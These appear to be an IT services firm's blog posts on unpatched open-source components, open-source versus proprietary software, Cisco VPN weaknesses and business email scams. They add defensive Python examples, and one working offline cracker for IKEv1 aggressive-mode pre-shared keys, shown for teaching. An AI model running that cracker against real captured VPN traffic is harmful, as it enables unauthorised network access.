What is less commonly considered or understood is the extent to which commercial products depend on their open-source counterparts. The liberal licensing used by most open-source projects allows commercial products to build on their work. For this reason open-source is everywhere, even when it is unacknowledged, re-branded and sold, uncredited, as part of another product. The danger is that the end user does not know which parts of a commercial product depend on open-source libraries. When a new vulnerability is found in open-source code, a patch is usually distributed quickly. But someone has to apply that patch. Because the commercial product’s code is not public, customers have no way of knowing which parts of the product stack are built on open-source code; they have neither the ability to apply the newly released patch nor the knowledge that they need to. The onus lies on the commercial vendor to track and ship these updates, something that often does not happen. Such delays in (or outright disregard for) shipping already-available fixes make the product more vulnerable even though the danger is hidden from you, the customer. This is exactly what happened to some companies whose websites ran on the Joomla CMS: a fix for the vulnerability had been published well before the attacks, but whoever maintained those sites never applied it.

“Park ‘n Fly and OneStopParking.com suffered from attacks due to an open-sourced based security vulnerability that existed in the Joomla content management platform. A security patch had been issued well before the attack, but unfortunately the patch was never installed.”  – Aaron Tantleff  (Source)
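The practical counterpart to the point above is to insist on a list of the open-source components a commercial product ships (a software bill of materials) and to check it against published fixes yourself rather than waiting on the vendor. The following is an added example in Python, not code from the original post; the inventory, component names and advisory identifiers in it are constructed for the demonstration and are not real products or advisories.

```python
"""Check bundled open-source components against published fixed versions.

Added example, not from the original post. The inventory (what an SBOM for a
commercial product would list) and the advisory table are constructed; the
component names and advisory IDs are made up for the demo.
"""
import re


def version_key(v: str) -> tuple:
    """'2.4.7' -> (2, 4, 7); a '-rc1' or 'p3' suffix is ignored for comparison."""
    m = re.match(r"\d+(?:\.\d+)*", v)
    return tuple(int(p) for p in m.group(0).split(".")) if m else ()


def version_lt(a: str, b: str) -> bool:
    """True when version a is older than version b ('1.9.9' < '1.10.0')."""
    ka, kb = version_key(a), version_key(b)
    n = max(len(ka), len(kb))
    return ka + (0,) * (n - len(ka)) < kb + (0,) * (n - len(kb))


# Constructed advisory table: first version that carries the fix.
ADVISORIES = [
    {"id": "ADV-2017-001", "component": "imgcodec", "fixed_in": "1.8.3"},
    {"id": "ADV-2017-002", "component": "xmlparse", "fixed_in": "3.0.0"},
    {"id": "ADV-2017-003", "component": "tlslib", "fixed_in": "2.2.10"},
]

# Constructed inventory: what the vendor's SBOM says ships inside the appliance.
INVENTORY = [
    {"component": "imgcodec", "version": "1.8.1"},
    {"component": "xmlparse", "version": "3.1.2"},
    {"component": "tlslib", "version": "2.2.10"},
    {"component": "jsonfast", "version": "0.9"},
]


def unpatched(inventory, advisories) -> list:
    """Return (component, shipped, fixed_in, advisory) for every stale component."""
    hits = []
    for item in inventory:
        for adv in advisories:
            if adv["component"] == item["component"] and version_lt(item["version"], adv["fixed_in"]):
                hits.append((item["component"], item["version"], adv["fixed_in"], adv["id"]))
    return hits


if __name__ == "__main__":
    for name, shipped, fixed, adv in unpatched(INVENTORY, ADVISORIES):
        print(f"{name} {shipped} is older than the fix in {fixed} ({adv})")
```

Run as a script it prints the components that are older than the advisory’s fixed version. The comparison deliberately ignores suffixes such as -rc1, which is good enough to flag an unpatched build, but a vendor that backports a fix without bumping the version number will still show up here, so a hit is a question to put to the vendor, not proof by itself.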

A Way Forward


Typically small businesses cannot afford either the time or the expense to monitor developments in the security world and implement the necessary corrections in a timely fashion. One possible solution comes from contracting with a Professional IT team who will not only diligently monitor your systems but also offer and implement security recommendations to avoid larger issues later and the needless expenses those can incur. With a technology partner, at far less than the cost of a dedicated employee, safety is not as expensive as you might think.

Take a minute to check our features and services for business http://teksperts.nyc/features.

Photos: http://www.pexels.com

Which is Better: Open-source or Corporate Platforms?


Open-source software is developed by people all over the world. It relies on crowd development, which is similar in concept to what crowdfunding does for financial projects. A diverse assortment of skilled developers design purposeful software that they themselves will use. They freely exchange ideas and source code (what is inside the software) with anyone, in the hope that others will use it and participate further in its development. Open-source software is good enough that corporations openly use it to build and improve their own products. As a result, open-source is everywhere: you will find it in your MacBook, cellphone, car, watch…even in MRI scanners.

Corporate platforms are devices and services that run on proprietary software: software whose source code is available only to the company’s own engineers, which is in most cases illegal to alter, and whose use is controlled by strict licensing that limits even paying customers to very specific use cases. Examples of such platforms are Cisco Adaptive Security Appliances, macOS, and the vendor firmware layered on top of Android phones (Android’s core is itself open-source).

Below, in the manner of an ancient Greek dialogue, we address common concerns clients have about using open-source software:

We don’t want to use something made by random people—no one knows who they are.

You are already using open-source software: it lives inside corporate-built equipment and systems, much of which is built on open-source components. Most people participating in open-source development are well known. They even use their work email addresses for exchanging information and receiving donations.

What if those open-source people are malicious and will seek to install some kind of backdoor to later hack our business?

They lack the motive. The first users for their software are the developers themselves. I remember when I started using the BSD platform in college—the first thing I did was submit fixes to the driver software to make my computers work faster on the network. This participation in the development process was for my own use, but it benefited everyone else as well.

Even if corporations use open-source, I trust they thoroughly check it before including it in their products.

This is rarely the case. Corporations generally prefer fast profits to paying employees to pore over community code for months on a hunt for issues that may not even be there. Pragmatism drives much of corporate software. But with open-source software, you know someone somewhere is working to make that code a little better.

We don’t know whether there is a backdoor in open-source software or not.

Code submitted to a well-run open-source project is reviewed by maintainers and other independent contributors before it is merged, and it keeps being read by the project’s future users. A backdoor is unlikely to be missed by all those independent reviewers, and collectively they have no motive to keep one hidden. The caveat a security practitioner would add is that this assurance is only as strong as the project’s review practices, so it holds best for widely used, actively maintained projects.

On the other hand, a corporation’s development can be so compartmentalized and its programmers so isolated that most will never know whether they are writing part of a backdoor. Usually no one, not even the developers, knows everything the final product will include.

I still feel there is a possibility of a malicious open-source backdoor that would allow someone to sneak into our systems. Maybe whole development groups are evil.

But you can check over the code yourself or ask someone else to do it for you.

With corporate platforms you are prevented from reviewing the source code for backdoors (perhaps partly so no one can see how messy and inefficient the code really is!). You simply have to trust that the corporation will do right by you, even though many of those platforms are known to have had backdoors in them already, in some cases implemented at the request of government agencies. For example, Avaya phone systems have been found to contain modules designed to help spy on foreign governments.

Modern software does not let one component simply take over your computer and do whatever it wants. A computer system consists of many blocks (separately developed pieces, many of them open-source) interacting with each other and with you.

If one piece (say, some open-source program) starts doing something strange, other pieces (a network packet filter, for instance) can see the unexpected traffic and either notify you or make it visible to administrators. The practical caveat is that a packet filter only sees what crosses the network; catching misbehaviour on the host itself also takes host-level monitoring, such as logging which processes start and which files they touch.

Recent revelations, such as the discovery that a Conexant audio driver shipped on many HP laptops included a hidden keylogger (software that records all of the user’s keystrokes, passwords included, to an unencrypted file on the PC), raise the question: are we wise to blindly trust corporations?

Professionals recommend corporate products.

Sometimes this is done merely as a way to save time for them. They don’t usually want to bother providing and supporting secure, custom-built, open-source solutions for small businesses. Many professionals rely on corporate advertising to drive their recommendations and to sell an easy solution. (Advertising is often more like propaganda with a dubious attachment to honest facts.) It takes more than the recommendation of splashy, popular IT solutions to establish the professionalism of an IT service provider. And while they may be selling you the splashy corporate solutions, no doubt at some critical points they are themselves using open-source platforms for power, security and cost efficiency.

I want to support the market’s economic growth by using corporate systems.

This might have a short-term effect on the economy. But every corporate product has open-source components inside it. By supporting open-source software you make a long-term investment in the growth and future development of technology. Without open-source there would be no iPhones, tablets, networks…

People who know the trade will argue that open-source solutions require hiring smarter people, and many small businesses cannot afford the $200,000 annual salary of a professional engineer. Typically, small businesses end up hiring amateurs for day-to-day computer fixes and enter a never-ending cycle of network, security, and server issues.

But there is a better way. For a fraction of the cost, small businesses can team up with outsourced IT companies who employ their own professionals and reap the benefits of better service while keeping costs significantly lower.

Take a minute to check our key features and services your business could be taking advantage of at http://teksperts.nyc/features.


Add a Professional Tech Team to Your Business?


Without a doubt, high performance networking hardware can make things more difficult for an outsider to hack into your company’s network, but new vulnerabilities continue to be found and exploited on even the costliest of equipment. Note, for instance, this torrent of vulnerabilities affecting top-level Cisco products (updated on Cisco’s website):

[Screenshot: Cisco’s security advisory listing]

The descriptions of many of these vulnerabilities end with warnings like: “An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device.” Even something as routine as a site-to-site VPN between your offices is at risk if it is configured for IKEv1 aggressive mode with a pre-shared key: in that mode the responder sends its authentication hash in the clear, so anyone who captures the exchange can brute-force the pre-shared key offline with freely available tools such as ikecrack.
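To see why aggressive mode is a problem, here is an added example in Python, not code from the original post and not ikecrack itself, that models the pre-shared-key authentication of RFC 2409 and recovers a weak key from a captured exchange. The exchange values, the pre-shared key and the wordlist are constructed for the demonstration, and HMAC-SHA1 is assumed as the negotiated PRF.

```python
"""Why IKEv1 aggressive mode with a pre-shared key is crackable offline.

Added example: not code from the original post, and not ikecrack. It models
the RFC 2409 pre-shared-key derivation with HMAC-SHA1 as the PRF. Every
field value, the PSK and the wordlist are constructed for the demo.
"""
import hashlib
import hmac
from typing import Optional


def prf(key: bytes, data: bytes) -> bytes:
    """RFC 2409 prf when SHA-1 is the negotiated hash algorithm: HMAC-SHA1."""
    return hmac.new(key, data, hashlib.sha1).digest()


def hash_r(psk: bytes, x: dict) -> bytes:
    """Responder's authentication hash for pre-shared-key auth (RFC 2409, 5.4).

    SKEYID = prf(psk, Ni_b | Nr_b)
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
    In aggressive mode every input here except the PSK crosses the wire in
    cleartext, so an eavesdropper can recompute HASH_R for each PSK guess.
    """
    skeyid = prf(psk, x["ni"] + x["nr"])
    return prf(skeyid, x["gxr"] + x["gxi"] + x["cky_r"] + x["cky_i"] + x["sa_i"] + x["id_r"])


def capture_aggressive_mode(psk: bytes) -> dict:
    """Stand-in for a sniffed aggressive-mode exchange (constructed values).

    The responder's second message carries Nr, g^xr, IDir and HASH_R in the
    clear, before the initiator has proven anything. In main mode HASH_R is
    sent inside a payload encrypted with a key derived from the DH secret,
    which is why the same attack does not apply there.
    """
    x = {
        "cky_i": bytes.fromhex("0102030405060708"),   # initiator cookie
        "cky_r": bytes.fromhex("1112131415161718"),   # responder cookie
        "ni": bytes.fromhex("a1" * 16),               # initiator nonce
        "nr": bytes.fromhex("b2" * 16),               # responder nonce
        "gxi": bytes.fromhex("c3" * 32),              # DH publics (real ones are longer)
        "gxr": bytes.fromhex("d4" * 32),
        "sa_i": bytes.fromhex("00000001000000010000002c"),  # toy SA payload body
        "id_r": b"\x02\x00\x00\x00vpn.example.com",         # ID payload body, FQDN type
    }
    x["hash_r"] = hash_r(psk, x)
    return x


def crack_psk(capture: dict, candidates) -> Optional[bytes]:
    """Offline dictionary attack: recompute HASH_R per guess, compare to captured."""
    target = capture["hash_r"]
    for guess in candidates:
        if hmac.compare_digest(hash_r(guess, capture), target):
            return guess
    return None


WORDLIST = [b"password", b"cisco123", b"vpn", b"summer2015", b"Welcome1"]  # constructed

if __name__ == "__main__":
    cap = capture_aggressive_mode(b"summer2015")
    print("recovered PSK:", crack_psk(cap, WORDLIST))
```

Because the responder hands over HASH_R before the initiator authenticates, an attacker does not even need to sniff a real session: starting the exchange with a known group name yields the same material. Main mode sends the hash inside an encrypted payload keyed from the Diffie-Hellman secret, which is why it is not exposed to this offline attack. The fix is to disable aggressive mode (on a Cisco ASA, `crypto ikev1 am-disable`) and to move to certificate authentication or IKEv2 rather than relying on a guessable shared secret.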

While professional-grade hardware is a good first step toward better protecting your company’s data, it cannot be your only step.

Companies, whatever their size, are wise to seek the aid of IT professionals to help them keep an eye on the security of their system, establish better business practices, and monitor their system for suspicious activity that might otherwise easily go unnoticed. Even as a small business, you should have some measures in place for your system to be monitored by an IT professional. This need not require a great deal of time. By establishing a technology partnership with a competent IT company, you can secure the dedicated, protective services you need from experienced professionals (whether standalone or supplementary to your own IT department).

A high-performance firewall is a priority service feature.


Take a minute to check other key features and services your business could be taking advantage of at http://teksperts.nyc/features.


Links:

Posted Cisco vulnerabilities: https://tools.cisco.com/security/center/publicationListing.x

VPN aggressive mode hacking tool: http://ikecrack.sourceforge.net

Protect Yourself from Costly Email Scams


Recently one of our clients nearly lost $60,000 to an email scam. Please be advised that even when the email address appears legitimate, and even if the money request arrives in reply to a previous email, you should confirm by phone (using a number you already have on file, not one given in the email) before sending money, particularly internationally. A separate email to an address you already trust is a second-best check, since the attacker may control the mailbox you would otherwise be replying to.

In April of this year, the FBI warned business owners of a “dramatic increase in business email scams.” Two of the most common Business Email Compromise (BEC) attacks involve:

  • Compromising an internal corporate email account and using it to request legitimate-looking but fraudulent financial transfers.
  • “Spoofing” a high-level employee’s (CEO, Senior Accountant, etc.) address from a nearly identical external domain (e.g. BillGates@Mirccom) and using that address to request fraudulent money transfers to private accounts.

Recently, a new and more insidious attack (called “wire-wire”) has come to light. This attack involves scammers collecting publicly available business email addresses. These addresses are then specifically targeted to be infected with malware (usually through an infected email attachment or a malicious web link).

Once infected, the malware transmits screenshots and keylogs which allow the scammers to gain further access to the computer. Noting when a legitimate money transaction is about to take place, scammers can then intercept legitimate outgoing invoices, modify the routing details and pass them to their proper recipients from a very similar-looking email address. Invoices are paid, but the money then is transferred to the scammer’s account. (For more on this process, see the infographic below).

Often the scam is not detected quickly (because the invoice was expected and appeared legitimate) until the payer begins to receive notices from the original payee that payment is overdue. Currently, small to mid-sized businesses that conduct frequent international money transfers seem to be the primary targets for this attack.

[Infographic: how the wire-wire invoice-interception scam works]

The FBI recommends the following tips for businesses:

  • Be wary of e-mail-only wire transfer requests and requests involving urgency
  • Pick up the phone and verify legitimate business partners.
  • Be cautious of mimicked e-mail addresses
  • Practice multi-level authentication.
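The FBI’s advice to watch for mimicked addresses and urgency can be partly automated at the mail gateway or in a SIEM. Here is an added example in Python, not code from the original post or from the FBI or SecureWorks material it cites, that scores an incoming invoice email for the signs of the wire-wire pattern described above: a sender or Reply-To domain within a couple of characters of a trusted partner’s domain, a Reply-To that does not match From, an announced change of bank details, and pressure for urgency. The trusted domains, phrase lists and the two sample messages are constructed for the demonstration.

```python
"""Flag invoice email that matches the wire-wire / BEC pattern.

Added example, not from the original post or the FBI/SecureWorks material it
cites. Trusted domains, phrase lists and both sample messages are constructed.
"""
import email
from email.utils import parseaddr

TRUSTED_DOMAINS = {"ourcompany.com", "example-partner.com"}  # constructed

# Wording that typically accompanies a redirected payment (constructed lists).
BANK_CHANGE_PHRASES = ("changed our bank", "new bank", "new account", "updated wire", "new beneficiary")
URGENCY_PHRASES = ("urgent", "immediately", "today", "as soon as possible")


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; 'exarnple.com' is 2 edits away from 'example.com'."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def domain_of(header_value) -> str:
    """Domain part of an address header, lower-cased; '' if absent."""
    _, addr = parseaddr(header_value or "")
    return addr.rpartition("@")[2].lower()


def lookalike_of(domain: str, trusted=TRUSTED_DOMAINS, max_edits: int = 2):
    """Trusted domain this one imitates, or None if it is exact or unrelated."""
    for t in trusted:
        if domain != t and edit_distance(domain, t) <= max_edits:
            return t
    return None


def check_message(raw: str) -> list:
    """Return human-readable findings for one RFC 822 message; [] means clean."""
    msg = email.message_from_string(raw)
    findings = []
    from_dom = domain_of(msg.get("From"))
    reply_dom = domain_of(msg.get("Reply-To"))
    for label, dom in (("From", from_dom), ("Reply-To", reply_dom)):
        imitated = lookalike_of(dom) if dom else None
        if imitated:
            findings.append(f"{label} domain {dom} looks like trusted {imitated}")
    if reply_dom and reply_dom != from_dom:
        findings.append(f"Reply-To domain {reply_dom} differs from From domain {from_dom}")
    body = msg.get_payload() if not msg.is_multipart() else ""
    text = (msg.get("Subject", "") + "\n" + body).lower()
    if any(p in text for p in BANK_CHANGE_PHRASES):
        findings.append("message announces changed payment details")
    if any(p in text for p in URGENCY_PHRASES):
        findings.append("message presses for urgency")
    return findings


# Constructed sample: spoofed From, lookalike Reply-To, new bank details, urgency.
SUSPICIOUS = """\
From: "Accounts Receivable" <billing@example-partner.com>
Reply-To: billing@exarnple-partner.com
To: ap@ourcompany.com
Subject: Invoice 4471 - updated wire instructions

Please note we have changed our bank. Kindly remit payment today to the
new account below.
"""

# Constructed sample: the same partner, nothing unusual.
LEGIT = """\
From: "Accounts Receivable" <billing@example-partner.com>
To: ap@ourcompany.com
Subject: Invoice 4471

Attached is invoice 4471 for the April shipment. Thank you.
"""

if __name__ == "__main__":
    for name, raw in (("suspicious", SUSPICIOUS), ("legit", LEGIT)):
        print(name, check_message(raw) or "no findings")
```

Edit distance catches typo-squats like exarnple-partner.com, and the Reply-To check catches the common trick of a genuine-looking From with replies steered elsewhere. Neither catches a scammer who has taken over the partner’s real mailbox, which is exactly why the phone call to a number already on file stays in the list above regardless of what the scoring says.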

Source: SecureWorks, via http://spectrum.ieee.org/techtalk/telecom/security/nigerianscammersinfectthemselveswithownmalwarerevealingnewwirewirefraudscheme

Additional Reading:

https://www.engadget.com/2016/08/08/nigerianemailscammermalware/
http://www.nairaland.com/3270589/nigerianscammersinfectthemselvesown